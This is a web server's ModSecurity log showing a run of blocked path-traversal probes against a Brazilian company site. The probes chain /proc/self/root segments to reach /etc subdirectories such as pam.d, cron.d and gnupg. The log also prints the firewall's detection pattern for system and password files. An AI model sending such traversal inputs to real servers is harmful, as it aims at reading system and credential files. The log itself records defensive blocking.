[Mon Mar 16 10:44:33.273016 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.241.46:36362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJQQlT9VtDQc7bgUyhJAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:34.549302 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:33424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJQnjZBu2q05ozVU9KAgAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:44:34.567475 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.241.46:36376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJQnjZBu2q05ozVU9KAwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:44:36.911367 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:33438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJRHjZBu2q05ozVU9KBwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:45:23.509908 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.241.46:36386] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJc3jZBu2q05ozVU9KOAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:45:34.133403 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:54534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJff9ocpUE4ed4uDziLwAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:45:36.655321 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:34732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJf_9ocpUE4ed4uDziMQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:45:41.453430 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:51150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJhbysWC90G-1nBrA6LgAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:02.234554 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.228.16:52090] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgJmv9ocpUE4ed4uDziNgAAAgo"]
[Mon Mar 16 10:46:09.353254 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.241.46:51154] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJoXbQATo66fKoS7xCFQAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:10.666992 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.241.46:33590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJoglT9VtDQc7bgUyhTwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:16.758871 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:33596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJqNSswJuvopo3lOhUKgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:18.114503 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.241.46:44316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJqglT9VtDQc7bgUyhUAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:19.293698 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:44328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJq_9ocpUE4ed4uDziOAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:20.045221 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.243.203:33452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJrHbQATo66fKoS7xCKQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:46:21.337293 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:35038] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJrRXjF1vJNtV6CWrtVwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:21.737972 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.241.46:44336] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJrQlT9VtDQc7bgUyhVQAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:23.111653 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:44352] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJr7ysWC90G-1nBrA6NQAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:27.365332 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:35042] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJs3jZBu2q05ozVU9KWQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:46:33.487177 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:35048] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJuY6lpbStxTqkSktidQAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:46:45.570469 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:43850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJxf9ocpUE4ed4uDziRQAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:47:16.416981 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.243.203:52572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJ5BXjF1vJNtV6CWrtdgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:47:25.550898 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:38988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgJ7f9ocpUE4ed4uDziWAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
